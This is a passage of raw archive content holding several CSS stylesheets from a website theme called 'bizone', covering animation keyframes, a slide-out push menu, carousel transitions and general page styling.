slideOutRight{0%{-webkit-transform:translateX(0);-ms-transform:translateX(0);transform:translateX(0)}100%{opacity:0;-webkit-transform:translateX(2000px);-ms-transform:translateX(2000px);transform:translateX(2000px)}}.slideOutRight{-webkit-animation-name:slideOutRight;animation-name:slideOutRight}@-webkit-keyframes slideOutUp{0%{-webkit-transform:translateY(0);transform:translateY(0)}100%{opacity:0;-webkit-transform:translateY(-2000px);transform:translateY(-2000px)}}@keyframes slideOutUp{0%{-webkit-transform:translateY(0);-ms-transform:translateY(0);transform:translateY(0)}100%{opacity:0;-webkit-transform:translateY(-2000px);-ms-transform:translateY(-2000px);transform:translateY(-2000px)}}.slideOutUp{-webkit-animation-name:slideOutUp;animation-name:slideOutUp}@-webkit-keyframes slideInUp{0%{opacity:0;-webkit-transform:translateY(2000px);transform:translateY(2000px)}100%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@keyframes slideInUp{0%{opacity:0;-webkit-transform:translateY(2000px);-ms-transform:translateY(2000px);transform:translateY(2000px)}100%{opacity:1;-webkit-transform:translateY(0);-ms-transform:translateY(0);transform:translateY(0)}}.slideInUp{-webkit-animation-name:slideInUp;animation-name:slideInUp}@-webkit-keyframes slideOutDown{0%{-webkit-transform:translateY(0);transform:translateY(0)}100%{opacity:0;-webkit-transform:translateY(2000px);transform:translateY(2000px)}}@keyframes slideOutDown{0%{-webkit-transform:translateY(0);-ms-transform:translateY(0);transform:translateY(0)}100%{opacity:0;-webkit-transform:translateY(2000px);-ms-transform:translateY(2000px);transform:translateY(2000px)}}.slideOutDown{-webkit-animation-name:slideOutDown;animation-name:slideOutDown}@-webkit-keyframes hinge{0%{-webkit-transform:rotate(0);transform:rotate(0);-webkit-transform-origin:top left;transform-origin:top left;-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}20%,60%{-webkit-transform:rotate(80deg);transform:rotate(80deg);-webkit-transform-origin:top left;transform-origin:top left;-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}40%{-webkit-transform:rotate(60deg);transform:rotate(60deg);-webkit-transform-origin:top left;transform-origin:top left;-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}80%{-webkit-transform:rotate(60deg) translateY(0);transform:rotate(60deg) translateY(0);-webkit-transform-origin:top left;transform-origin:top left;-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out;opacity:1}100%{-webkit-transform:translateY(700px);transform:translateY(700px);opacity:0}}@keyframes hinge{0%{-webkit-transform:rotate(0);-ms-transform:rotate(0);transform:rotate(0);-webkit-transform-origin:top left;-ms-transform-origin:top left;transform-origin:top left;-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}20%,60%{-webkit-transform:rotate(80deg);-ms-transform:rotate(80deg);transform:rotate(80deg);-webkit-transform-origin:top left;-ms-transform-origin:top left;transform-origin:top left;-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}40%{-webkit-transform:rotate(60deg);-ms-transform:rotate(60deg);transform:rotate(60deg);-webkit-transform-origin:top left;-ms-transform-origin:top left;transform-origin:top left;-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}80%{-webkit-transform:rotate(60deg) translateY(0);-ms-transform:rotate(60deg) translateY(0);transform:rotate(60deg) translateY(0);-webkit-transform-origin:top left;-ms-transform-origin:top left;transform-origin:top left;-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out;opacity:1}100%{-webkit-transform:translateY(700px);-ms-transform:translateY(700px);transform:translateY(700px);opacity:0}}.hinge{-webkit-animation-name:hinge;animation-name:hinge}@-webkit-keyframes rollIn{0%{opacity:0;-webkit-transform:translateX(-100%) rotate(-120deg);transform:translateX(-100%) rotate(-120deg)}100%{opacity:1;-webkit-transform:translateX(0px) rotate(0deg);transform:translateX(0px) rotate(0deg)}}@keyframes rollIn{0%{opacity:0;-webkit-transform:translateX(-100%) rotate(-120deg);-ms-transform:translateX(-100%) rotate(-120deg);transform:translateX(-100%) rotate(-120deg)}100%{opacity:1;-webkit-transform:translateX(0px) rotate(0deg);-ms-transform:translateX(0px) rotate(0deg);transform:translateX(0px) rotate(0deg)}}.rollIn{-webkit-animation-name:rollIn;animation-name:rollIn}@-webkit-keyframes rollOut{0%{opacity:1;-webkit-transform:translateX(0px) rotate(0deg);transform:translateX(0px) rotate(0deg)}100%{opacity:0;-webkit-transform:translateX(100%) rotate(120deg);transform:translateX(100%) rotate(120deg)}}@keyframes rollOut{0%{opacity:1;-webkit-transform:translateX(0px) rotate(0deg);-ms-transform:translateX(0px) rotate(0deg);transform:translateX(0px) rotate(0deg)}100%{opacity:0;-webkit-transform:translateX(100%) rotate(120deg);-ms-transform:translateX(100%) rotate(120deg);transform:translateX(100%) rotate(120deg)}}.rollOut{-webkit-animation-name:rollOut;animation-name:rollOut}@-webkit-keyframes zoomIn{0%{opacity:0;-webkit-transform:scale(.3);transform:scale(.3)}50%{opacity:1}}@keyframes zoomIn{0%{opacity:0;-webkit-transform:scale(.3);-ms-transform:scale(.3);transform:scale(.3)}50%{opacity:1}}.zoomIn{-webkit-animation-name:zoomIn;animation-name:zoomIn}@-webkit-keyframes zoomInDown{0%{opacity:0;-webkit-transform:scale(.1) translateY(-2000px);transform:scale(.1) translateY(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateY(60px);transform:scale(.475) translateY(60px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@keyframes zoomInDown{0%{opacity:0;-webkit-transform:scale(.1) translateY(-2000px);-ms-transform:scale(.1) translateY(-2000px);transform:scale(.1) translateY(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateY(60px);-ms-transform:scale(.475) translateY(60px);transform:scale(.475) translateY(60px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}.zoomInDown{-webkit-animation-name:zoomInDown;animation-name:zoomInDown}@-webkit-keyframes zoomInLeft{0%{opacity:0;-webkit-transform:scale(.1) translateX(-2000px);transform:scale(.1) translateX(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateX(48px);transform:scale(.475) translateX(48px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@keyframes zoomInLeft{0%{opacity:0;-webkit-transform:scale(.1) translateX(-2000px);-ms-transform:scale(.1) translateX(-2000px);transform:scale(.1) translateX(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateX(48px);-ms-transform:scale(.475) translateX(48px);transform:scale(.475) translateX(48px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}.zoomInLeft{-webkit-animation-name:zoomInLeft;animation-name:zoomInLeft}@-webkit-keyframes zoomInRight{0%{opacity:0;-webkit-transform:scale(.1) translateX(2000px);transform:scale(.1) translateX(2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateX(-48px);transform:scale(.475) translateX(-48px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@keyframes zoomInRight{0%{opacity:0;-webkit-transform:scale(.1) translateX(2000px);-ms-transform:scale(.1) translateX(2000px);transform:scale(.1) translateX(2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateX(-48px);-ms-transform:scale(.475) translateX(-48px);transform:scale(.475) translateX(-48px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}.zoomInRight{-webkit-animation-name:zoomInRight;animation-name:zoomInRight}@-webkit-keyframes zoomInUp{0%{opacity:0;-webkit-transform:scale(.1) translateY(2000px);transform:scale(.1) translateY(2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateY(-60px);transform:scale(.475) translateY(-60px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@keyframes zoomInUp{0%{opacity:0;-webkit-transform:scale(.1) translateY(2000px);-ms-transform:scale(.1) translateY(2000px);transform:scale(.1) translateY(2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateY(-60px);-ms-transform:scale(.475) translateY(-60px);transform:scale(.475) translateY(-60px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}.zoomInUp{-webkit-animation-name:zoomInUp;animation-name:zoomInUp}@-webkit-keyframes zoomOut{0%{opacity:1;-webkit-transform:scale(1);transform:scale(1)}50%{opacity:0;-webkit-transform:scale(.3);transform:scale(.3)}100%{opacity:0}}@keyframes zoomOut{0%{opacity:1;-webkit-transform:scale(1);-ms-transform:scale(1);transform:scale(1)}50%{opacity:0;-webkit-transform:scale(.3);-ms-transform:scale(.3);transform:scale(.3)}100%{opacity:0}}.zoomOut{-webkit-animation-name:zoomOut;animation-name:zoomOut}@-webkit-keyframes zoomOutDown{40%{opacity:1;-webkit-transform:scale(.475) translateY(-60px);transform:scale(.475) translateY(-60px);-webkit-animation-timing-function:linear;animation-timing-function:linear}100%{opacity:0;-webkit-transform:scale(.1) translateY(2000px);transform:scale(.1) translateY(2000px);-webkit-transform-origin:center bottom;transform-origin:center bottom}}@keyframes zoomOutDown{40%{opacity:1;-webkit-transform:scale(.475) translateY(-60px);-ms-transform:scale(.475) translateY(-60px);transform:scale(.475) translateY(-60px);-webkit-animation-timing-function:linear;animation-timing-function:linear}100%{opacity:0;-webkit-transform:scale(.1) translateY(2000px);-ms-transform:scale(.1) translateY(2000px);transform:scale(.1) translateY(2000px);-webkit-transform-origin:center bottom;-ms-transform-origin:center bottom;transform-origin:center bottom}}.zoomOutDown{-webkit-animation-name:zoomOutDown;animation-name:zoomOutDown}@-webkit-keyframes zoomOutLeft{40%{opacity:1;-webkit-transform:scale(.475) translateX(42px);transform:scale(.475) translateX(42px);-webkit-animation-timing-function:linear;animation-timing-function:linear}100%{opacity:0;-webkit-transform:scale(.1) translateX(-2000px);transform:scale(.1) translateX(-2000px);-webkit-transform-origin:left center;transform-origin:left center}}@keyframes zoomOutLeft{40%{opacity:1;-webkit-transform:scale(.475) translateX(42px);-ms-transform:scale(.475) translateX(42px);transform:scale(.475) translateX(42px);-webkit-animation-timing-function:linear;animation-timing-function:linear}100%{opacity:0;-webkit-transform:scale(.1) translateX(-2000px);-ms-transform:scale(.1) translateX(-2000px);transform:scale(.1) translateX(-2000px);-webkit-transform-origin:left center;-ms-transform-origin:left center;transform-origin:left center}}.zoomOutLeft{-webkit-animation-name:zoomOutLeft;animation-name:zoomOutLeft}@-webkit-keyframes zoomOutRight{40%{opacity:1;-webkit-transform:scale(.475) translateX(-42px);transform:scale(.475) translateX(-42px);-webkit-animation-timing-function:linear;animation-timing-function:linear}100%{opacity:0;-webkit-transform:scale(.1) translateX(2000px);transform:scale(.1) translateX(2000px);-webkit-transform-origin:right center;transform-origin:right center}}@keyframes zoomOutRight{40%{opacity:1;-webkit-transform:scale(.475) translateX(-42px);-ms-transform:scale(.475) translateX(-42px);transform:scale(.475) translateX(-42px);-webkit-animation-timing-function:linear;animation-timing-function:linear}100%{opacity:0;-webkit-transform:scale(.1) translateX(2000px);-ms-transform:scale(.1) translateX(2000px);transform:scale(.1) translateX(2000px);-webkit-transform-origin:right center;-ms-transform-origin:right center;transform-origin:right center}}.zoomOutRight{-webkit-animation-name:zoomOutRight;animation-name:zoomOutRight}@-webkit-keyframes zoomOutUp{40%{opacity:1;-webkit-transform:scale(.475) translateY(60px);transform:scale(.475) translateY(60px);-webkit-animation-timing-function:linear;animation-timing-function:linear}100%{opacity:0;-webkit-transform:scale(.1) translateY(-2000px);transform:scale(.1) translateY(-2000px);-webkit-transform-origin:center top;transform-origin:center top}}@keyframes zoomOutUp{40%{opacity:1;-webkit-transform:scale(.475) translateY(60px);-ms-transform:scale(.475) translateY(60px);transform:scale(.475) translateY(60px);-webkit-animation-timing-function:linear;animation-timing-function:linear}100%{opacity:0;-webkit-transform:scale(.1) translateY(-2000px);-ms-transform:scale(.1) translateY(-2000px);transform:scale(.1) translateY(-2000px);-webkit-transform-origin:center top;-ms-transform-origin:center top;transform-origin:center top}}.zoomOutUp{-webkit-animation-name:zoomOutUp;animation-name:zoomOutUp}PK!��ژ
	
	bizone/css/jPushMenu.cssnu&1i�

/* Orientation-dependent styles for the content of the menu */
.cbp-spmenu-vertical {
    width: 240px;
    height: 100%;
    top: 0;
    z-index: 1000;
    overflow-y: auto;
}

.cbp-spmenu-vertical a {
}

.cbp-spmenu-horizontal {
    width: 100%;
    height: 150px;
    left: 0;
    z-index: 1000;
    overflow: hidden;
}

.cbp-spmenu-horizontal h3 {
    height: 100%;
    width: 20%;
    float: left;
}

.cbp-spmenu-horizontal a {
    float: left;
    width: 20%;
    padding: 0.8em;
    border-left: 1px solid #258ecd;
}

/* Vertical menu that slides from the left or right */
.cbp-spmenu-left {
    left: -240px;
}

.cbp-spmenu-right {
    right: -240px;
}

.cbp-spmenu-left.menu-open {
    left: 0px;
}

.cbp-spmenu-right.menu-open {
    right: 0px;
}

/* Horizontal menu that slides from the top or bottom */

.cbp-spmenu-top {
    top: -150px;
}

.cbp-spmenu-bottom {
    bottom: -150px;
}

.cbp-spmenu-top.menu-open {
    top: 0px;
}

.cbp-spmenu-bottom.menu-open {
    bottom: 0px;
}

/* Push classes applied to the body */
.push-body {
    overflow-x: hidden;
    position: relative;
    left: 0;
}

.push-body-toright {
    left: 240px;
}

.push-body-toleft {
    left: -240px;
}

/* Transitions */
.cbp-spmenu,
.push-body {
    -webkit-transition: all 0.3s ease;
       -moz-transition: all 0.3s ease;
            transition: all 0.3s ease;
}


#main-navigation .social-link{ margin:25px 0 0 25px;}
#main-navigation .social-link i{ color:#000;}
#main-navigation .social-link i:hover{ color:#fff;}

/* Example media queries */
@media screen and (max-width: 767px){
#main-navigation{
	background-color:transparent;
}
}
@media screen and (max-width: 55.1875em) {
    .cbp-spmenu-horizontal {
        font-size: 75%;
        height: 110px;
    }

    .cbp-spmenu-top {
        top: -110px;
    }

    .cbp-spmenu-bottom {
        bottom: -110px;
    }
}

@media screen and (max-height: 26.375em) {
    .cbp-spmenu-vertical {
        font-size: 90%;
        width: 190px;
    }

    .cbp-spmenu-left,
    .push-body-toleft {
        left: -190px;
    }

    .cbp-spmenu-right {
        right: -190px;
    }

    .push-body-toright {
        left: 190px;
    }
}




PK!���bizone/css/owl.transitions.cssnu&1i�/* 
 *  Owl Carousel CSS3 Transitions 
 *  v1.3.2
 */

.owl-origin {
	-webkit-perspective: 1200px;
	-webkit-perspective-origin-x : 50%;
	-webkit-perspective-origin-y : 50%;
	-moz-perspective : 1200px;
	-moz-perspective-origin-x : 50%;
	-moz-perspective-origin-y : 50%;
	perspective : 1200px;
}
/* fade */
.owl-fade-out {
  z-index: 10;
  -webkit-animation: fadeOut .7s both ease;
  -moz-animation: fadeOut .7s both ease;
  animation: fadeOut .7s both ease;
}
.owl-fade-in {
  -webkit-animation: fadeIn .7s both ease;
  -moz-animation: fadeIn .7s both ease;
  animation: fadeIn .7s both ease;
}
/* backSlide */
.owl-backSlide-out {
  -webkit-animation: backSlideOut 1s both ease;
  -moz-animation: backSlideOut 1s both ease;
  animation: backSlideOut 1s both ease;
}
.owl-backSlide-in {
  -webkit-animation: backSlideIn 1s both ease;
  -moz-animation: backSlideIn 1s both ease;
  animation: backSlideIn 1s both ease;
}
/* goDown */
.owl-goDown-out {
  -webkit-animation: scaleToFade .7s ease both;
  -moz-animation: scaleToFade .7s ease both;
  animation: scaleToFade .7s ease both;
}
.owl-goDown-in {
  -webkit-animation: goDown .6s ease both;
  -moz-animation: goDown .6s ease both;
  animation: goDown .6s ease both;
}
/* scaleUp */
.owl-fadeUp-in {
  -webkit-animation: scaleUpFrom .5s ease both;
  -moz-animation: scaleUpFrom .5s ease both;
  animation: scaleUpFrom .5s ease both;
}

.owl-fadeUp-out {
  -webkit-animation: scaleUpTo .5s ease both;
  -moz-animation: scaleUpTo .5s ease both;
  animation: scaleUpTo .5s ease both;
}
/* Keyframes */
/*empty*/
@-webkit-keyframes empty {
  0% {opacity: 1}
}
@-moz-keyframes empty {
  0% {opacity: 1}
}
@keyframes empty {
  0% {opacity: 1}
}
@-webkit-keyframes fadeIn {
  0% { opacity:0; }
  100% { opacity:1; }
}
@-moz-keyframes fadeIn {
  0% { opacity:0; }
  100% { opacity:1; }
}
@keyframes fadeIn {
  0% { opacity:0; }
  100% { opacity:1; }
}
@-webkit-keyframes fadeOut {
  0% { opacity:1; }
  100% { opacity:0; }
}
@-moz-keyframes fadeOut {
  0% { opacity:1; }
  100% { opacity:0; }
}
@keyframes fadeOut {
  0% { opacity:1; }
  100% { opacity:0; }
}
@-webkit-keyframes backSlideOut {
  25% { opacity: .5; -webkit-transform: translateZ(-500px); }
  75% { opacity: .5; -webkit-transform: translateZ(-500px) translateX(-200%); }
  100% { opacity: .5; -webkit-transform: translateZ(-500px) translateX(-200%); }
}
@-moz-keyframes backSlideOut {
  25% { opacity: .5; -moz-transform: translateZ(-500px); }
  75% { opacity: .5; -moz-transform: translateZ(-500px) translateX(-200%); }
  100% { opacity: .5; -moz-transform: translateZ(-500px) translateX(-200%); }
}
@keyframes backSlideOut {
  25% { opacity: .5; transform: translateZ(-500px); }
  75% { opacity: .5; transform: translateZ(-500px) translateX(-200%); }
  100% { opacity: .5; transform: translateZ(-500px) translateX(-200%); }
}
@-webkit-keyframes backSlideIn {
  0%, 25% { opacity: .5; -webkit-transform: translateZ(-500px) translateX(200%); }
  75% { opacity: .5; -webkit-transform: translateZ(-500px); }
  100% { opacity: 1; -webkit-transform: translateZ(0) translateX(0); }
}
@-moz-keyframes backSlideIn {
  0%, 25% { opacity: .5; -moz-transform: translateZ(-500px) translateX(200%); }
  75% { opacity: .5; -moz-transform: translateZ(-500px); }
  100% { opacity: 1; -moz-transform: translateZ(0) translateX(0); }
}
@keyframes backSlideIn {
  0%, 25% { opacity: .5; transform: translateZ(-500px) translateX(200%); }
  75% { opacity: .5; transform: translateZ(-500px); }
  100% { opacity: 1; transform: translateZ(0) translateX(0); }
}
@-webkit-keyframes scaleToFade {
  to { opacity: 0; -webkit-transform: scale(.8); }
}
@-moz-keyframes scaleToFade {
  to { opacity: 0; -moz-transform: scale(.8); }
}
@keyframes scaleToFade {
  to { opacity: 0; transform: scale(.8); }
}
@-webkit-keyframes goDown {
  from { -webkit-transform: translateY(-100%); }
}
@-moz-keyframes goDown {
  from { -moz-transform: translateY(-100%); }
}
@keyframes goDown {
  from { transform: translateY(-100%); }
}

@-webkit-keyframes scaleUpFrom {
  from { opacity: 0; -webkit-transform: scale(1.5); }
}
@-moz-keyframes scaleUpFrom {
  from { opacity: 0; -moz-transform: scale(1.5); }
}
@keyframes scaleUpFrom {
  from { opacity: 0; transform: scale(1.5); }
}

@-webkit-keyframes scaleUpTo {
  to { opacity: 0; -webkit-transform: scale(1.5); }
}
@-moz-keyframes scaleUpTo {
  to { opacity: 0; -moz-transform: scale(1.5); }
}
@keyframes scaleUpTo {
  to { opacity: 0; transform: scale(1.5); }
}PK!����ƸƸbizone/css/onepage.cssnu�[��� @charset "utf-8";
/* CSS Document 

Table Of Content

+General Styling and Tags
*body
+ @font-face

+ Header

+ #main-navigation
-.navigation
	- .navbar-nav
		- .page-scroll

+- #main-slider

+ #about
	-.canvas-box

+ #bg-paralax

+ #facts
	-.number-counters
		-.counters-item 
		
+ #responsive
	-.responsive-pic
	-.r-test
		-.r-feature
			-.screens

+ #experties
	-.myStat2
	-.circliful
		-.circle-text
			-canvas

+ .we-do
	-.do-wrap

+ #thinkers
	-.thinker-wrap
		-.social-contact
	
+ #project
   - .work-filter 
	- .work-item
		- .overlay
			- .overlay-inner


+ #pricing
	-.pricing 
	-.pricing_tenzin
		-.pricing_item 
			-.pricing_title
			-.pricing_price
			-.pricing_sentence
			-.pricing_list
			-.pricing_action

			
+ #testinomial
	-#testinomial-slider
	-.owl-carousel
		.item

+ #publication
	-#publication-slider
	-.owl-carousel
		.item
		
+ #contact
	-#letstalk

+ ##area-main
	-.blog-wrap
		-.blog-content
			-.blog-item
		

+ footer
	-.breadcrumb

*/






/****** General Styling ******/
body{
	 color:#222222;
    font-family: "Open Sans", sans-serif;
	 overflow-x: hidden;
	 font-size:14px;
	 
}
ul , ol{
	margin:0;
	padding:0;
	list-style:none;
}
a ,
a:hover , 
a:focus{
	text-decoration:none;
	outline:none;
	color:inherit;
}
input[type="submit"]{
	background-color:transparent;
}	
button:focus {
    outline: medium none;
}
h1,
h2, 
h3, 
h4, 
#testinomial-slider .item h5{
	margin:0;
}
h1{
	font-size:46px;
}
h2, 
h3,
h4{
	text-transform:capitalize;
	font-family: "raleway";
}

h2{
	font-size:24px;
}
h3{
	font-size:24px;
	font-weight: 600;
}

h4{
	font-size:18px;
	text-transform: capitalize;
    font-weight: 600;
}
p{
	font-size:14px;
	color:#222222;
}
textarea{
	resize:none;
}
p.title{
	font-size:14px;
	text-transform:capitalize;
}
.heading{
	margin-bottom:40px;
}
.padding{
	padding:90px 0;
}
.top-padding{
	padding-top:90px;
}
.bottom-padding{
	padding-bottom: 90px;
}
.box-section.nopadding .bt-boxfluid,
.container-fluid.nopadding{
	padding-left: 0;
	padding-right: 0;
}
.section-padding{
	padding-top:130px!important;
}
#about.section-padding{
	padding-top:170px!important;	
}
.padding-botom{
	padding-bottom:90px;
}
.magin30{
	margin-bottom:30px;
}
.dark{
	background:#1b1d1f;
}
.light{
	background:#f5f5f5;
}
.base_color{
	background:#82b440;
}

.green{
	background:#74c8b8;
}

.pink{
	background:#ec768c;
}

.purple{
	background:#c183d6;
}

.blue{
	background:#31aae1;
}

.green-text{
	color:#74c8b8;
}
.pink-text{
	color:#ec768c;
}
.purple-text{
	color:#c183d6;
}

.blue-text{
	color:#31aae1;
}

.bg-grey{
	background:#ececec;
}

/*Buttons*/
.btn-common{
	border:1px solid #fff;
	color:#fff;
}

.btn-black{
	border:1px solid #000;
	color:#000;
}
.btn-green{
	background:#82B440;
	border:1px solid transparent;
}	
.btn-blue{
	background:#07AAA5;
	border:1px solid transparent;
}
.btn-pink{
	background:#ec768c;
	border:1px solid transparent;
}
.btn-common,
.btn-black,
.btn-white,
.loadmore{
	font-size:15px;
	font-weight:bold;
	text-transform:capitalize;
	display:inline-block;
	padding:12px 30px;
}
.btn-white{
	background:#fff;
	color:#000;
	border:1px solid transparent;
}
a.readmore{
	font-size:13px;
	font-weight:bold;
	text-decoration:underline;
	display:inline-block;
	text-transform:uppercase;
}
a.readmore:hover, a.readmore:focus{
	color:#82b440;
}
.loadmore{
	color:#222222;
	margin-top:40px;
	position:relative;
	-webkit-transition: color 0.3s ease 0s;
	-ms-transition: color 0.3s ease 0s;
	-o-transition: color 0.3s ease 0s;
	transition: color 0.3s ease 0s;
}
.loadmore:hover{
	color:#82b440;
}
.loadmore::before {
  color: transparent;
  content: "•";
  font-size: 1.2em;
  left:95%;
  pointer-events: none;
  position: absolute;
  text-shadow: 0 0 transparent;
  top:25%;
  transform: translateX(-50%);
  transition: text-shadow 0.3s ease 0s, color 0.3s ease 0s;
}
.loadmore:hover::before, .loadmore:focus::before {
  color: #82b440;
  text-shadow: 10px 0 #82b440, -10px 0 #82b440;
}

/* Bounce To Top */
.bounce-top,
.bounce-green,
.bounce-white, 
.bounce-pink{
  display: inline-block;
  vertical-align: middle;
  -webkit-transform: translateZ(0);
  transform: translateZ(0);
  box-shadow: 0 0 1px rgba(0, 0, 0, 0);
  -webkit-backface-visibility: hidden;
  backface-visibility: hidden;
  -moz-osx-font-smoothing: grayscale;
  position: relative;
  -webkit-transition-property: color;
  transition-property: color;
  -webkit-transition-duration: 0.5s;
  transition-duration: 0.5s;
}
.bounce-pink:before{
	background:#EC768C !important;
}
.bounce-top:before{
	background: #07AAA5;
	
}
.bounce-green:before{
	background:#82B440;
}
.bounce-white:before{
	background: #fff;
}	
.bounce-top:before,
.bounce-green:before,
.bounce-white:before,
.bounce-pink:before{
  content: "";
  position: absolute;
  z-index: -1;
  top: 0;
  left: 0;
  right: 0;
  bottom: 0;
  -webkit-transform: scaleY(0);
  transform: scaleY(0);
  -webkit-transform-origin: 50% 100%;
  transform-origin: 50% 100%;
  -webkit-transition-property: transform;
  transition-property: transform;
  -webkit-transition-duration: 0.5s;
  transition-duration: 0.5s;
  -webkit-transition-timing-function: ease-out;
  transition-timing-function: ease-out;
}
.bounce-top:hover, .bounce-top:focus{
   color: #fff!important;
   border:1px solid #07AAA5;
}
.bounce-pink:hover, .bounce-pink:focus{
   color: #fff !important;
   border:1px solid #EC768C !important;
}
.bounce-green:hover, .bounce-green:focus{
   color: #fff;
   border:1px solid #82B440;
}
.bounce-white:hover, .bounce-white:focus{
	color:#1b1d1f !important;
	border:1px solid #fff;
}	
.bounce-top:hover:before, .bounce-top:focus:before, 
.bounce-green:hover::before, .bounce-green:focus::before,
.bounce-white:hover::before, .bounce-white:focus::before,
.bounce-pink:hover::before, .bounce-pink:focus::before{
  -webkit-transform: scaleY(1);
  transform: scaleY(1);
  -webkit-transition-timing-function: cubic-bezier(0.52, 1.64, 0.37, 0.66);
  transition-timing-function: cubic-bezier(0.52, 1.64, 0.37, 0.66);
}


/*Section with image*/
.info-section {
	overflow:hidden;
}
.info-section .row {
    margin: 0;
}

.info-section .block {
    position: relative;
}
.info-section ul.social-media{
}

.info-section ul.social-media li{
	display:inline-block;
}

.info-section ul.social-media li a{
	color:#1b1d1f;
	font-size:20px;
	margin-right:10px;
	display:block;
	margin-top:25px;
}
.info-section ul.social-media li a:hover,.info-section ul.social-media li a:focus{
	color:#82b440
}

.info-section .bg {
    background-size: cover;
	 background-position: center center;
    bottom: 0;
    left: 0;
    position:relative;
    right: 0;
    top: 0;
	 padding-top:75%;
	 margin:0 -15px;
}

.info-section .block {
	padding-top:0;
	padding:90px 5%;
}
.info-section .block .center {
  height:100%;
}


/*Header Starts*/
a, #navigation.affix .navbar-default .navbar-nav > li > a,
#main-navigation, #navigation.affix, .navbar-brand,
#navigation.affix .navbar-default .navbar-nav > li > a,
.push_nav li a,
ul.top-right li a:hover,
#about .canvas-box span i, #about .canvas-box h4,
#about .canvas-box:hover span i,
.we-do .do-wrap i, .we-do .do-wrap:hover i,
.counters-item i, .counters-item:hover i,
.thinker-image .overlay,
.work-filter ul li a,
.main-button, .main-button > button span, .overlay,
.we-do .do-wrap:hover .top, .we-do .do-wrap:hover span,
#paralax-slider .owl-controls .owl-page span{
	-webkit-transition: all .3s ease;
   -moz-transition: all .3s ease;
	-ms-transition: all .3s ease;
   -o-transition:all .3s ease;
	transition:all .3s ease;
}	
#main-navigation {
  position: absolute;
 
}
#navigation.affix {
  background-color: #fff;
  position: fixed;
  -webkit-box-shadow:0 2px 10px -1px rgba(87, 97, 100, 0.35);
  -moz-box-shadow:0 2px 10px -1px rgba(87, 97, 100, 0.35);
   box-shadow: 0 2px 10px -1px rgba(87, 97, 100, 0.35);

}
#main-navigation, #navigation.affix{
	top: 0;
	z-index:999;
	width: 100%;

}	
.navbar-default {
  background-color: transparent;
  border-color: transparent;
}
.navbar , .navbar-default{
	  border:none;
}
.navbar {
  margin-bottom: 0;
  min-height: auto;
}
 .navbar-collapse {
   overflow-x: visible !important;
}
.navbar-collapse.in {
  overflow-y: auto !important;
  height: auto !important;
}
.navbar-brand {
  height: auto;
  padding:29px 0;
  float:none;
  display:block;
  width:150px;
}
#navigation.affix .navbar-brand {
  padding: 16px 0;
  width: 134px;
}
.navbar-default .navbar-nav > li{
	 margin:0 20px;
}
.navbar-default .navbar-nav > li > a {
  color: #229aff;
  font-size:12px;
  font-weight:600;
  letter-spacing:1px;
  text-transform:uppercase;
  padding:37px 0 15px 0;
  border-bottom:3px solid transparent;
}
#navigation.affix .navbar-default .navbar-nav > li > a{
	color: #222;
	padding:22px 0;
		
}
.navbar-default .navbar-nav > li > a:hover,
#navigation.affix .navbar-default .navbar-nav > li > a:hover{
	color:#065574;
	background-color:transparent;
}
.navbar-default .navbar-nav > .active a, .navbar-default .navbar-nav > .active a:hover,
.navbar-default .navbar-nav > .active a:focus,
#navigation.affix .navbar-default .navbar-nav > .active a, #navigation.affix .navbar-default .navbar-nav > .active a:hover,
#navigation.affix .navbar-default .navbar-nav > .active a:focus{
	color:#065574;
	border-bottom:3px solid #075da6;
	background-color:transparent;
}	

.navbar-toggle {
  background: transparent !important;
  border: medium none;
  margin-right: 0;
}

.navbar-toggle:hover {
  background: transparent !important;
}
.navbar-toggle .icon-bar {
  width: 22px;
  -webkit-transition: all 0.2s;
  -ms-transition: all 0.2s;
  -o-transition: all 0.2s;
  transition: all 0.2s;
  background-color:#fff !important;
}
#navigation.affix .navbar-toggle .icon-bar{
	background-color:#222 !important;
}	
.navbar-toggle .top-bar {
  transform: rotate(45deg);
  transform-origin: 10% 10%;
}
.navbar-toggle .middle-bar {
  opacity: 0;
  filter: alpha(opacity=0);
}
.navbar-toggle .bottom-bar {
  transform: rotate(-45deg);
  transform-origin: 10% 90%;
}
.navbar-toggle.collapsed .top-bar {
  transform: rotate(0);
}
.navbar-toggle.collapsed .middle-bar {
  opacity: 1;
  filter: alpha(opacity=100);
}
.navbar-toggle.collapsed .bottom-bar {
  transform: rotate(0);
}
/*Social Icons On Headers*/
ul.top-right {
  float: right;
  width: auto;
  margin: 34px 0 34px 10px;
  position:relative;
  z-index:1000;
}
#navigation.affix ul.top-right{
	margin:17px 0 17px 10px;
}
ul.top-right li{
	display:inline-block;
	margin-left:2px;
}
ul.top-right li a {
  display: block;
